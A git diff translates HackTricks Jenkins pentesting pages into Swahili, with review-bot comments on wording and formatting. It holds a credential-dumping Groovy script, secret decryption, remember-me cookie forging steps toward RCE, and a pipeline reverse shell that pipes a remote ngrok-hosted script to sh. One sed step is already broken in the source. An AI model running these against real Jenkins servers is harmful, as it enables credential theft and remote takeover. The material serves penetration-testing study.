-#### Decrypt Jenkins secrets from Groovy
-
+#### Tafsiri siri za Jenkins kutoka Groovy
```bash
println(hudson.util.Secret.decrypt("{...}"))
```
+### Unda mtumiaji mpya wa admin
-### Create new admin user
+1. Fikia faili la Jenkins config.xml katika `/var/lib/jenkins/config.xml` au `C:\Program Files (x86)\Jenkis\`
+2. Tafuta neno `true` na badilisha neno **`true`** kuwa **`false`**.
+1. `sed -i -e 's/truefalsetrue` na **restart Jenkins tena**.
-1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\`
-2. Search for the word `true`and change the word \*\*`true` \*\* to **`false`**.
- 1. `sed -i -e 's/truefalsetrue` and **restart the Jenkins again**.
-
-## References
+## Marejeleo
- [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
- [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
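Review bot: the "create new admin user" steps are translated together with a command that is already broken in the source: `1. `sed -i -e 's/truefalsetrue` na **restart Jenkins tena**.` has an unterminated quote and no `s/old/new/` delimiters, and `Tafuta neno `true`` tells the reader to search for a bare `true` because the XML element name from the original config.xml line has been lost in both the `-` and `+` text. Restore the element name and the full `sed` expression from the upstream English page before translating, or drop the sub-step rather than publish an unrunnable command. The path `C:\Program Files (x86)\Jenkis\` carries the `Jenkis` typo over from the `-` line. The steps flip one `true` to `false` and restart Jenkins; no user is created, so the heading `### Unda mtumiaji mpya wa admin` overstates what the procedure does in both languages. `#### Tafsiri siri za Jenkins kutoka Groovy` uses "tafsiri" (translate) for a step that calls `hudson.util.Secret.decrypt`; "Simbua siri za Jenkins kutoka Groovy" is the intended meaning.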
@@ -410,7 +382,3 @@ println(hudson.util.Secret.decrypt("{...}"))
- [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
index 6e62a8536..f4b98938f 100644
--- a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
+++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
@@ -6,48 +6,48 @@
### Username + Password
-The most common way to login in Jenkins if with a username or a password
+Njia ya kawaida zaidi ya kuingia kwenye Jenkins ni kwa kutumia jina la mtumiaji au nenosiri.
### Cookie
-If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen).
+Ikiwa **cookie iliyoidhinishwa inapatikana**, inaweza kutumika kufikia kikao cha mtumiaji. Cookie hiyo kwa kawaida inaitwa `JSESSIONID.*`. (Mtumiaji anaweza kumaliza vikao vyake vyote, lakini itabidi ajue kwanza kwamba cookie ilipatikana).
### SSO/Plugins
-Jenkins can be configured using plugins to be **accessible via third party SSO**.
+Jenkins inaweza kuundwa kwa kutumia plugins ili iweze **kupatikana kupitia SSO ya upande wa tatu**.
### Tokens
-**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API.
+**Watumiaji wanaweza kuunda tokens** ili kutoa ufikiaji kwa programu kujiwakilisha kupitia CLI au REST API.
### SSH Keys
-This component provides a built-in SSH server for Jenkins. Itās an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/))
+Kipengele hiki kinatoa seva ya SSH iliyojengwa ndani kwa Jenkins. Ni kiolesura mbadala kwa [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), na amri zinaweza kutolewa kwa njia hii kwa kutumia mteja yeyote wa SSH. (Kutoka kwenye [docs](https://plugins.jenkins.io/sshd/))
## Authorization
-In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
+Katika `/configureSecurity` inawezekana **kuunda njia ya kuidhinisha ya Jenkins**. Kuna chaguzi kadhaa:
-- **Anyone can do anything**: Even anonymous access can administrate the server
-- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
-- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
-- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
+- **Mtu yeyote anaweza kufanya chochote**: Hata ufikiaji wa kutokuwa na jina unaweza kusimamia seva.
+- **Hali ya urithi**: Sawasawa na Jenkins <1.164. Ikiwa una **"nafasi ya admin"**, utapewa **udhibiti kamili** juu ya mfumo, na **vinginevyo** (ikiwemo **watumiaji wasiojulikana**) utakuwa na **ufikiaji wa kusoma**.
+- **Watumiaji walioingia wanaweza kufanya chochote**: Katika hali hii, kila **mtumiaji aliyeingia anapata udhibiti kamili** wa Jenkins. Mtumiaji pekee ambaye hatakuwa na udhibiti kamili ni **mtumiaji asiyejulikana**, ambaye anapata tu **ufikiaji wa kusoma**.
+- **Usalama wa msingi wa Matrix**: Unaweza kuunda **nani anaweza kufanya nini** katika jedwali. Kila **safu** inawakilisha **idhini**. Kila **mstari** **unawakilisha** **mtumiaji au kundi/nafasi.** Hii inajumuisha mtumiaji maalum '**asiyejulikana**', ambaye anawakilisha **watumiaji wasio na uthibitisho**, pamoja na '**uthibitishwa**', ambaye anawakilisha **watumiaji wote walio na uthibitisho**.
.png>)
-- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
-- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
+- **Mkakati wa Uidhinishaji wa Msingi wa Mradi:** Hali hii ni **nyongeza** kwa "**Usalama wa msingi wa Matrix**" inayoruhusu ACL ya ziada kuundwa **kwa kila mradi tofauti.**
+- **Mkakati wa Kazi:** Inaruhusu kuunda idhini kwa kutumia **mkakati wa kazi**. Simamia nafasi katika `/role-strategy`.
## **Security Realm**
-In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
+Katika `/configureSecurity` inawezekana **kuunda eneo la usalama.** Kwa kawaida Jenkins inajumuisha msaada wa maeneo kadhaa tofauti ya Usalama:
-- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
-- **Jenkinsā own user database:** Use **Jenkinsās own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
-- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
-- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
+- **Delegates kwa kontena la servlet**: Kwa **kuhamasisha uthibitisho kwa kontena la servlet linaloendesha Jenkins controller**, kama [Jetty](https://www.eclipse.org/jetty/).
+- **Hifadhidata ya mtumiaji ya Jenkins:** Tumia **hifadhidata ya mtumiaji iliyojengwa ndani ya Jenkins** kwa uthibitisho badala ya kuhamasisha kwa mfumo wa nje. Hii imewezeshwa kwa kawaida.
+- **LDAP**: Hamisha uthibitisho wote kwa seva ya LDAP iliyowekwa, ikiwa ni pamoja na watumiaji na makundi.
+- **Hifadhidata ya mtumiaji/kundi ya Unix**: **Inahamisha uthibitisho kwa hifadhidata ya mtumiaji ya Unix** kwenye Jenkins controller. Hali hii pia itaruhusu matumizi ya makundi ya Unix kwa idhini.
-Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
+Plugins zinaweza kutoa maeneo ya usalama ya ziada ambayo yanaweza kuwa muhimu kwa kuingiza Jenkins katika mifumo ya utambulisho iliyopo, kama vile:
- [Active Directory](https://plugins.jenkins.io/active-directory)
- [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
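Review bot: several sentences in this hunk change meaning rather than language. `kwa kutumia jina la mtumiaji au nenosiri` ("username or password") should be `na nenosiri`; the English `-` line has the same "or" plus the stray "if with", so fix both sides. `Ikiwa **cookie iliyoidhinishwa inapatikana**` means "if an authorised cookie is available", dropping the threat "gets stolen" (inaibiwa), and the closing `kwamba cookie ilipatikana` has the same problem. `**Delegates kwa kontena la servlet**` is half-translated, and `kuhamasisha uthibitisho` renders "delegate" as "mobilise"; "kukabidhi uthibitisho" is the intended sense, and the same verb is needed in `badala ya kuhamasisha kwa mfumo wa nje`. `**Mkakati wa Kazi**` for Role-Based Strategy reads as "work strategy"; "Mkakati wa Majukumu" keeps the connection to `/role-strategy`.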
@@ -55,31 +55,31 @@ Plugins can provide additional security realms which may be useful for incorpora
## Jenkins Nodes, Agents & Executors
-Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/):
+M definitions kutoka kwenye [docs](https://www.jenkins.io/doc/book/managing/nodes/):
-**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold.
+**Nodes** ni **mashine** ambazo **wakala wa kujenga** zinaendesha. Jenkins inafuatilia kila node iliyoambatanishwa kwa ajili ya nafasi ya diski, nafasi ya muda ya bure, kubadilishana bure, muda wa saa/sawazisha na muda wa majibu. Node inachukuliwa kuwa nje ya mtandao ikiwa mojawapo ya hizi thamani inatoka nje ya kigezo kilichowekwa.
-**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine.
+**Agents** **wanasimamia** **utendaji wa kazi** kwa niaba ya Jenkins controller kwa **kutumia waendeshaji**. Wakala anaweza kutumia mfumo wowote wa uendeshaji unaounga mkono Java. Zana zinazohitajika kwa ajili ya kujenga na majaribio zimewekwa kwenye node ambapo wakala anafanya kazi; zinaweza **kuwekwa moja kwa moja au kwenye kontena** (Docker au Kubernetes). Kila **wakala kwa ufanisi ni mchakato wenye PID yake mwenyewe** kwenye mashine mwenyeji.
-An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time.
+**Executor** ni **nafasi ya utekelezaji wa kazi**; kwa ufanisi, ni **thread katika wakala**. **Idadi ya waendeshaji** kwenye node inafafanua idadi ya **kazi zinazoweza kufanyika kwa wakati mmoja** kwenye node hiyo. Kwa maneno mengine, hii inamua **idadi ya hatua za Pipeline `stages`** zinazoweza kutekelezwa kwenye node hiyo kwa wakati mmoja.
## Jenkins Secrets
### Encryption of Secrets and Credentials
-Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include:
+M definition kutoka kwenye [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins inatumia **AES kuandika na kulinda siri**, akidi, na funguo zao za uandishi. Funguo hizi za uandishi zimehifadhiwa katika `$JENKINS_HOME/secrets/` pamoja na funguo kuu inayotumika kulinda funguo hizo. Hii directory inapaswa kuundwa ili tu mtumiaji wa mfumo wa uendeshaji ambaye Jenkins controller inafanya kazi kama awe na ufikiaji wa kusoma na kuandika kwenye directory hii (yaani, thamani ya `chmod` ya `0700` au kutumia sifa sahihi za faili). **Funguo kuu** (wakati mwingine inaitwa "funguo ya uandishi wa funguo" katika cryptojargon) inahifadhiwa \_bila kuandikwa\_ kwenye mfumo wa faili wa Jenkins controller katika **`$JENKINS_HOME/secrets/master.key`** ambayo haiwezi kulinda dhidi ya washambuliaji wenye ufikiaji wa moja kwa moja kwa faili hiyo. Watumiaji wengi na wabunifu watatumia funguo hizi za uandishi kwa njia isiyo ya moja kwa moja kupitia ama [Secret](https://javadoc.jenkins.io/byShortName/Secret) API kwa kuandika data ya siri ya kawaida au kupitia API ya akidi. Kwa wale wanaopenda cryptography, Jenkins inatumia AES katika hali ya kuandika block chaining (CBC) na PKCS#5 padding na IV za nasibu kuandika matukio ya [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) ambayo yanahifadhiwa katika `$JENKINS_HOME/secrets/` kwa jina la faili linalolingana na `CryptoConfidentialKey` id yao. Idadi za kawaida za funguo ni pamoja na:
-- `hudson.util.Secret`: used for generic secrets;
-- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
-- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
+- `hudson.util.Secret`: inatumika kwa siri za kawaida;
+- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: inatumika kwa aina fulani za akidi;
+- `jenkins.model.Jenkins.crumbSalt`: inatumika na [mekanism ya ulinzi wa CSRF](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); na
### Credentials Access
-Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job//configure`) and therefore only accessible from the specific project.
+Akidi zinaweza **kuwekwa kwa watoa huduma wa kimataifa** (`/credentials/`) ambazo zinaweza kufikiwa na mradi wowote ulioandaliwa, au zinaweza kuwekwa kwa **miradi maalum** (`/job//configure`) na hivyo kufikiwa tu kutoka mradi maalum.
-According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials.
+Kulingana na [**docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Akidi ambazo ziko katika upeo zinapatikana kwa pipeline bila kikomo. Ili **kuzuia kufichuliwa kwa bahati mbaya katika kumbukumbu ya kujenga**, akidi zime **fichwa** kutoka kwa matokeo ya kawaida, hivyo mwito wa `env` (Linux) au `set` (Windows), au programu zinazochapisha mazingira yao au vigezo hazitafichua katika kumbukumbu ya kujenga** kwa watumiaji ambao vinginevyo hawangeweza kupata akidi hizo.
-**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.**
+**Ndio maana ili kuhamasisha akidi mshambuliaji anahitaji, kwa mfano, kuziweka kwenye base64.**
## References
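Review bot: `M definitions kutoka kwenye [docs]` and `M definition kutoka kwenye [docs]` both begin with a stray `M ` that is not in the source; delete it. In the encryption paragraph "kuandika" (to write) stands in for encrypt throughout (`AES kuandika na kulinda siri`, `funguo za uandishi`, `\_bila kuandikwa\_`), which turns "stored unencrypted" into "stored unwritten"; use "kusimba" / "usimbaji" / "bila kusimbwa" and drop the `\_` escapes copied from the source's broken `**stored \_unencrypted**\_` markup. `Idadi za kawaida za funguo` means "common numbers of keys" where the sentence introduces common key *ids*; "Vitambulisho vya kawaida vya funguo" fits the list that follows (that list already ends in "; and" with no further item in both versions, so the truncation is pre-existing and should not be filled in here). The credentials-masking sentence has unbalanced emphasis: `zime **fichwa**` splits a word and `hazitafichua katika kumbukumbu ya kujenga**` closes bold that was never opened, so the rendered paragraph will show literal asterisks. `kuhamasisha akidi` again means "mobilise the credentials"; "kutoa akidi nje" or "kuvuja akidi" conveys exfiltration.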
@@ -92,7 +92,3 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m
- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
index 9d2b232e1..58204b264 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -2,108 +2,104 @@
{{#include ../../banners/hacktricks-training.md}}
-In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
+Katika chapisho hili la blog, inawezekana kupata njia nzuri ya kubadilisha udhaifu wa Local File Inclusion katika Jenkins kuwa RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
-This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own:
+Hii ni muhtasari ulioandikwa na AI wa sehemu ya chapisho ambapo ufundi wa kuki isiyo ya kawaida unatumika vibaya kupata RCE kwa kutumia kusoma faili za ndani hadi nitakapokuwa na muda wa kuunda muhtasari wangu mwenyewe:
-### Attack Prerequisites
+### Masharti ya Shambulio
-- **Feature Requirement:** "Remember me" must be enabled (default setting).
-- **Access Levels:** Attacker needs Overall/Read permissions.
-- **Secret Access:** Ability to read both binary and textual content from key files.
+- **Mahitaji ya Kipengele:** "Remember me" lazima iwe imewezeshwa (mipangilio ya default).
+- **Viwango vya Ufikiaji:** Mshambuliaji anahitaji ruhusa za Jumla/Soma.
+- **Ufikiaji wa Siri:** Uwezo wa kusoma maudhui ya binary na maandiko kutoka kwa faili muhimu.
-### Detailed Exploitation Process
+### Mchakato wa Kina wa Kutekeleza
-#### Step 1: Data Collection
+#### Hatua ya 1: Kukusanya Data
-**User Information Retrieval**
+**Ukurasa wa Taarifa za Mtumiaji**
-- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather:
- - **Username**
- - **User seed**
- - **Timestamp**
- - **Password hash**
+- Fikia usanidi wa mtumiaji na siri kutoka `$JENKINS_HOME/users/*.xml` kwa kila mtumiaji ili kukusanya:
+- **Jina la Mtumiaji**
+- **Mbegu ya Mtumiaji**
+- **Muda**
+- **Hash ya Nywila**
-**Secret Key Extraction**
+**Uondoaji wa Funguo za Siri**
-- Extract cryptographic keys used for signing the cookie:
- - **Secret Key:** `$JENKINS_HOME/secret.key`
- - **Master Key:** `$JENKINS_HOME/secrets/master.key`
- - **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
+- Ondoa funguo za kificho zinazotumika kwa ajili ya kusaini kuki:
+- **Funguo ya Siri:** `$JENKINS_HOME/secret.key`
+- **Funguo Kuu:** `$JENKINS_HOME/secrets/master.key`
+- **Faili ya Funguo ya MAC:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
-#### Step 2: Cookie Forging
+#### Hatua ya 2: Uundaji wa Kuki
-**Token Preparation**
+**Maandalizi ya Tokeni**
-- **Calculate Token Expiry Time:**
+- **Hesabu Muda wa Kuisha wa Tokeni:**
- ```javascript
- tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time
- ```
+```javascript
+tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Ongeza saa moja kwa wakati wa sasa
+```
-- **Concatenate Data for Token:**
+- **Unganisha Data kwa Tokeni:**
- ```javascript
- token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
- ```
+```javascript
+token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
+```
-**MAC Key Decryption**
+**Ufunguo wa MAC**
-- **Decrypt MAC Key File:**
+- **Fungua Faili ya Funguo ya MAC:**
- ```javascript
- key = toAes128Key(masterKey) // Convert master key to AES128 key format
- decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file
- if not decrypted.hasSuffix("::::MAGIC::::")
- return ERROR;
- macKey = decrypted.withoutSuffix("::::MAGIC::::")
- ```
+```javascript
+key = toAes128Key(masterKey) // Badilisha funguo kuu kuwa muundo wa funguo AES128
+decrypted = AES.decrypt(macFile, key) // Fungua faili ya .mac
+if not decrypted.hasSuffix("::::MAGIC::::")
+return ERROR;
+macKey = decrypted.withoutSuffix("::::MAGIC::::")
+```
-**Signature Computation**
+**Hesabu Saini**
-- **Compute HMAC SHA256:**
+- **Hesabu HMAC SHA256:**
- ```javascript
- mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key
- tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string
- ```
+```javascript
+mac = HmacSHA256(token, macKey) // Hesabu HMAC kwa kutumia tokeni na funguo ya MAC
+tokenSignature = bytesToHexString(mac) // Badilisha MAC kuwa mfuatano wa hexadecimal
+```
-**Cookie Encoding**
+**Ufungaji wa Kuki**
-- **Generate Final Cookie:**
+- **Unda Kuki ya Mwisho:**
- ```javascript
- cookie = base64.encode(
- username + ":" + tokenExpiryTime + ":" + tokenSignature
- ) // Base64 encode the cookie data
- ```
+```javascript
+cookie = base64.encode(
+username + ":" + tokenExpiryTime + ":" + tokenSignature
+) // Fanya base64 encode data ya kuki
+```
-#### Step 3: Code Execution
+#### Hatua ya 3: Utekelezaji wa Msimbo
-**Session Authentication**
+**Uthibitishaji wa Kikao**
-- **Fetch CSRF and Session Tokens:**
- - Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`.
- - Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie.
+- **Pata CSRF na Tokeni za Kikao:**
+- Fanya ombi kwa `/crumbIssuer/api/json` ili kupata `Jenkins-Crumb`.
+- Kamata `JSESSIONID` kutoka kwa jibu, ambayo itatumika pamoja na kuki ya remember-me.
-**Command Execution Request**
+**Ombi la Utekelezaji wa Amri**
-- **Send a POST Request with Groovy Script:**
+- **Tuma Ombi la POST na Skripti ya Groovy:**
- ```bash
- curl -X POST "$JENKINS_URL/scriptText" \
- --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
- --header "Jenkins-Crumb: $CRUMB" \
- --header "Content-Type: application/x-www-form-urlencoded" \
- --data-urlencode "script=$SCRIPT"
- ```
+```bash
+curl -X POST "$JENKINS_URL/scriptText" \
+--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
+--header "Jenkins-Crumb: $CRUMB" \
+--header "Content-Type: application/x-www-form-urlencoded" \
+--data-urlencode "script=$SCRIPT"
+```
- - Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
+- Skripti ya Groovy inaweza kutumika kutekeleza amri za kiwango cha mfumo au shughuli nyingine ndani ya mazingira ya Jenkins.
-The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely.
+Mfano wa amri ya curl iliyotolewa inaonyesha jinsi ya kufanya ombi kwa Jenkins na vichwa na kuki zinazohitajika ili kutekeleza msimbo usio wa kawaida kwa usalama.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
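Review bot: the nested lists in this hunk have lost their indentation, so "Jina la Mtumiaji", "Mbegu ya Mtumiaji", "Muda" and "Hash ya Nywila" now render as siblings of the "Fikia usanidi wa mtumiaji..." item instead of its sub-items, and the same flattening hits the "Funguo ya Siri / Funguo Kuu / Faili ya Funguo ya MAC" list and the fenced blocks that were indented under their bullets (the `tokenExpiryTime` block and the ones after it now sit outside the list). Restore the original indentation; only the text should change in a translation commit. Three wording fixes: "**Ukurasa wa Taarifa za Mtumiaji**" says "User Information Page" for "User Information Retrieval" ("Upataji wa Taarifa za Mtumiaji" keeps the meaning), "**Ufunguo wa MAC**" drops the "Decryption" half of "MAC Key Decryption", and in the closing paragraph "msimbo usio wa kawaida" means "unusual code" where the source says "arbitrary code" ("msimbo wowote").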
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
index 8699b8159..f98018c19 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
@@ -3,10 +3,9 @@
{{#include ../../banners/hacktricks-training.md}}
> [!WARNING]
-> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
-
-You can **dump all the secrets from the Groovy Script console** in `/script` running this code
+> Kumbuka kwamba hizi skripti zitaorodhesha tu siri ndani ya faili `credentials.xml`, lakini **faili za usanidi wa ujenzi** zinaweza pia kuwa na **siri zaidi**.
+Unaweza **kutoa siri zote kutoka kwenye Groovy Script console** katika `/script` ukikimbia hii code
```java
// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
import jenkins.model.*
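Review bot: deleting the blank line between the `> [!WARNING]` callout and the paragraph "Unaweza **kutoa siri zote...**" is a rendering bug, not a cosmetic change: a non-blank line directly after a blockquote is lazy continuation in CommonMark, so that sentence will be pulled into the warning box. Keep the empty line before "Unaweza". Also "ukikimbia hii code" leaves "code" untranslated and uses "kukimbia" (to run on foot) where "kuendesha" is the verb for running a script; "ukiendesha msimbo huu" reads correctly.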
@@ -42,52 +41,45 @@ showRow("something else", it.id, '', '', '')
return
```
-
-#### or this one:
-
+#### au hii:
```java
import java.nio.charset.StandardCharsets;
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
- com.cloudbees.plugins.credentials.Credentials.class
+com.cloudbees.plugins.credentials.Credentials.class
)
for (c in creds) {
- println(c.id)
- if (c.properties.description) {
- println(" description: " + c.description)
- }
- if (c.properties.username) {
- println(" username: " + c.username)
- }
- if (c.properties.password) {
- println(" password: " + c.password)
- }
- if (c.properties.passphrase) {
- println(" passphrase: " + c.passphrase)
- }
- if (c.properties.secret) {
- println(" secret: " + c.secret)
- }
- if (c.properties.secretBytes) {
- println(" secretBytes: ")
- println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
- println("")
- }
- if (c.properties.privateKeySource) {
- println(" privateKey: " + c.getPrivateKey())
- }
- if (c.properties.apiToken) {
- println(" apiToken: " + c.apiToken)
- }
- if (c.properties.token) {
- println(" token: " + c.token)
- }
- println("")
+println(c.id)
+if (c.properties.description) {
+println(" description: " + c.description)
+}
+if (c.properties.username) {
+println(" username: " + c.username)
+}
+if (c.properties.password) {
+println(" password: " + c.password)
+}
+if (c.properties.passphrase) {
+println(" passphrase: " + c.passphrase)
+}
+if (c.properties.secret) {
+println(" secret: " + c.secret)
+}
+if (c.properties.secretBytes) {
+println(" secretBytes: ")
+println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
+println("")
+}
+if (c.properties.privateKeySource) {
+println(" privateKey: " + c.getPrivateKey())
+}
+if (c.properties.apiToken) {
+println(" apiToken: " + c.apiToken)
+}
+if (c.properties.token) {
+println(" token: " + c.token)
+}
+println("")
}
```
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
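Review bot: every leading indent in the Groovy credential-listing script has been stripped (the body of `for (c in creds) {` and all of its nested `if (c.properties...)` blocks are now flush-left), which has nothing to do with the translation and makes the block much harder to read. Restore the indentation; the only lines a translation commit should touch in this hunk are the heading "#### au hii:" and comments.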
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
index 89ca15223..b06d2f846 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
@@ -2,42 +2,36 @@
{{#include ../../banners/hacktricks-training.md}}
-## Creating a new Pipeline
+## Kuunda Pipeline Mpya
-In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
+Katika "Kitu Kipya" (inapatikana katika `/view/all/newJob`) chagua **Pipeline:**
.png>)
-In the **Pipeline section** write the **reverse shell**:
+Katika **sehemu ya Pipeline** andika **reverse shell**:
.png>)
-
```groovy
pipeline {
- agent any
+agent any
- stages {
- stage('Hello') {
- steps {
- sh '''
- curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
- '''
- }
- }
- }
+stages {
+stage('Hello') {
+steps {
+sh '''
+curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
+'''
+}
+}
+}
}
```
-
-Finally click on **Save**, and **Build Now** and the pipeline will be executed:
+Hatimaye bonyeza **Save**, na **Build Now** na pipeline itatekelezwa:
.png>)
-## Modifying a Pipeline
+## Kubadilisha Pipeline
